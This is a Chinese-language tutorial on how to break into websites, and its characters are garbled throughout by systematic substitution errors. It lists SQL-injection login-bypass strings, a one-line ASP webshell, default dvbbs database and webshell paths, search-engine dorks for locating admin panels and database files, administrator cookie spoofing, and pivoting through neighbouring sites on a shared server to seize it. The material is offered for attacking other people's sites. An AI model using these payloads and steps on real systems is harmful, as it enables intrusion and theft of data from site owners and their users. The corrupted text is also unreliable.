關於入侵網站

如何去攻擊一個網站？
首先，觀察指定網站。

入侵指定網站是須要條件的：
要先觀察這個網站是動態仍是靜態的。
首先介紹下什麼樣站點能夠入侵：我認爲必須是動態的網站 如ASP、PHP、 JSP等代碼編寫的站點
若是是靜態的（.htm或html）,通常是不會成功的。若是要入侵的目標網站是動態的，就能夠利用動態網站的漏洞進行入侵。

Quote:
如下是入侵網站經常使用方法：
1.上傳漏洞
若是看到:選擇你要上傳的文件 [從新上傳]或者出現「請登錄後使用」，80%就有漏洞了！
有時上傳不必定會成功,這是由於Cookies不同.咱們就要用WSockExpert取得Cookies.再用DOMAIN上傳.　

2.注入漏洞
字符過濾不嚴形成的

3.暴庫:把二級目錄中間的/換成\　
　
　
4.’or’=’or’這是一個能夠鏈接SQL的語名句.能夠直接進入後臺。我收集了一下。相似的還有：
　’or’’=’　" or "a"="a　　 ’) or (’a’=’a　　 ") or ("a"="a　　or 1=1--　 ’ or ’a’=’a
5.社會工程學。這個咱們都知道吧。就是猜解。
　
6.寫入ASP格式數據庫。就是一句話木馬〈%execute request("value")%〉 （數據庫必需得是ASP或ASA的後綴）
　　
7.源碼利用：一些網站用的都是網上下載的源碼.有的站長很懶.什麼也不改.
好比：默認數據庫，默認後臺地址，默認管理員賬號密碼等
　　　
8.默認數據庫/webshell路徑利用:這樣的網站不少/利人別人的WEBSHELL.
/Databackup/dvbbs7.MDB
/bbs/Databackup/dvbbs7.MDB
/bbs/Data/dvbbs7.MDB
/data/dvbbs7.mdb
/bbs/diy.asp
/diy.asp
/bbs/cmd.asp
/bbs/cmd.exe
/bbs/s-u.exe
/bbs/servu.exe
工具：網站獵手　挖掘雞 明小子

9.查看目錄法:一些網站能夠斷開目錄，能夠訪問目錄。
210.37.95.65 images
10.工具溢出
　　　　　　
11.搜索引擎利用:
　
(1).inurl:flasher_list.asp　 默認數據庫:database/flash.mdb　 後臺/manager/
(2).找網站的管理後臺地址:
site:xxxx.comintext:管理
site:xxxx.comintitle:管理　 〈關鍵字不少，自已找〉
site:xxxx.cominurl:login
(3).查找access的數據庫,mssql、mysql的鏈接文件
allinurl:bbsdata
filetype:mdbinurl:database
filetype:incconn
inurl:datafiletype:mdb

12.COOKIE詐騙：把本身的ID修改爲管理員的，MD5密碼也修改爲他的，用桂林老兵工具能夠修改COOKIE。

13.利用常見的漏洞：如動網BBS
能夠先用:dvbbs權限提高工具，使自已成爲前臺管理員。
THEN，運用:動網固頂貼工具，找個固頂貼，再取得COOKIES，這個要你自已作。咱們能夠用WSockExpert取得Cookies/NC包
這個我就不作了，網上教程多的是，自已下個看看。
工具：dvbbs權限提高工具　 動網固頂貼工具
14.還有一些老漏洞。如IIS3，4的查看源碼，5的DELETE
　 CGI，PHP的一些老洞，我就不說了啊。。太老了。沒有什麼大用途。　　　　　　
　　　　　　　　　通常入侵思路　　　　
　　　　　　　腳本注入（ASP PHP JSP）
1.腳本漏洞　　　
　　　　　　　其它腳本漏洞（上傳漏洞，跨站漏洞等）　
　　　　　　　　
　　　　　　　　　
　　　　　　域名旁註　　　
2.旁註　　　　　
　　　　　 「IP」旁註

　　　　　　本地溢出
3.溢出漏洞　
　　　　　　遠程溢出

　　　　　　ARP欺騙
4.網絡竊聽
　　　　　　IP欺騙

5.社會工程學(社會工程實際上是心理學)
簡單的說，能夠利用以上方法來入侵，若是這個指定網站的確沒有漏洞，還能夠利用其它方式。。。

〓通往電腦的路不止一條〓若是目標網站程序沒有漏洞，能夠按照如下方法：首先判斷對方網站服務器主機的IP地址，好比：ping www.baidu.com，就能夠獲得百度網站的服務器IP地址，固然也能夠利用旁註等工具來查詢目標網站服務器的IP地址。。。能夠試着入侵目標網站所在的服務器，能夠用旁註工具來查詢這個服務器上都放了多少個網站。。。若是目標網站沒有漏洞，能夠試着入侵同服務器上的其它網站。。。若是可以入侵同服務器上的其它網站，就能夠得到權限，看能不可以提權拿到服務器等。也能夠直接入侵這臺網站的服務器！好比：用IP端口掃描軟件，掃描一下目標服務器都開放了哪些端口，而後利用開放的漏洞端口進行入侵。常見漏洞端口如何入侵，已經有不少這方面的資料了。還能夠查詢目標服務器有哪些漏洞，好比微軟最新Oday漏洞，利用漏洞拿到服務器權限。木馬入侵，讓網站主機感染你的木馬。主要是看目標網站服務器系統是否存在漏洞。